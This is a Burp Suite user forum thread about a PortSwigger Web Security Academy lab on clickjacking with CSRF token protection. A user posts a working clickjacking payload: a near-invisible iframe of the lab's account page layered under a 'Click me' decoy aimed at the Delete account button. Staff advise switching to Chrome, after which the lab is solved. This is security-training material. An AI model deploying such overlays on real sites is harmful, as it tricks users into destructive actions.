Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Lab: Basic clickjacking with CSRF token protection not being solved

Kaustubh | Last updated: Aug 01, 2024 06:14AM UTC

i followed through the solution and the community solution, in the exploit server i am pasting this payload ``` <style> iframe { position:relative; width:700px; height: 600px; opacity: 0.0001; z-index: 2; } div { position:absolute; top:500px; left:60px; z-index: 1; } </style> <div>Click me</div> <iframe src="https://0a240022042c8cab80fe308f001a0027.web-security-academy.net/my-account"></iframe> ``` i am storing it and then delivering it to victim but its not being solved. i have been trying for 2 days in various labs. the "Click Me" is right above the Delete account button, in view exploit i made sure of that and then increased the opactity to 0.0001 and then stored and viewed again and deilivered it to th victim but the lab does not show solved.

Dominyque, PortSwigger Agent | Last updated: Aug 01, 2024 07:18AM UTC

Hi Kaustubh To confirm, are you using your normal Chrome browser (not the embedded one)?

Kaustubh | Last updated: Aug 01, 2024 07:31AM UTC

i did try once in chrome but it just showed wrong csrf token. normally trying it in firefox and the embedded one, let me try again in normal chrome browser.

Kaustubh | Last updated: Aug 01, 2024 07:36AM UTC

ok it got solved. when tried in chrome browser. thanks. typically all the labs when it says use chrome, it gets solved regardless that i am using firefox.

Michelle, PortSwigger Agent | Last updated: Aug 01, 2024 01:00PM UTC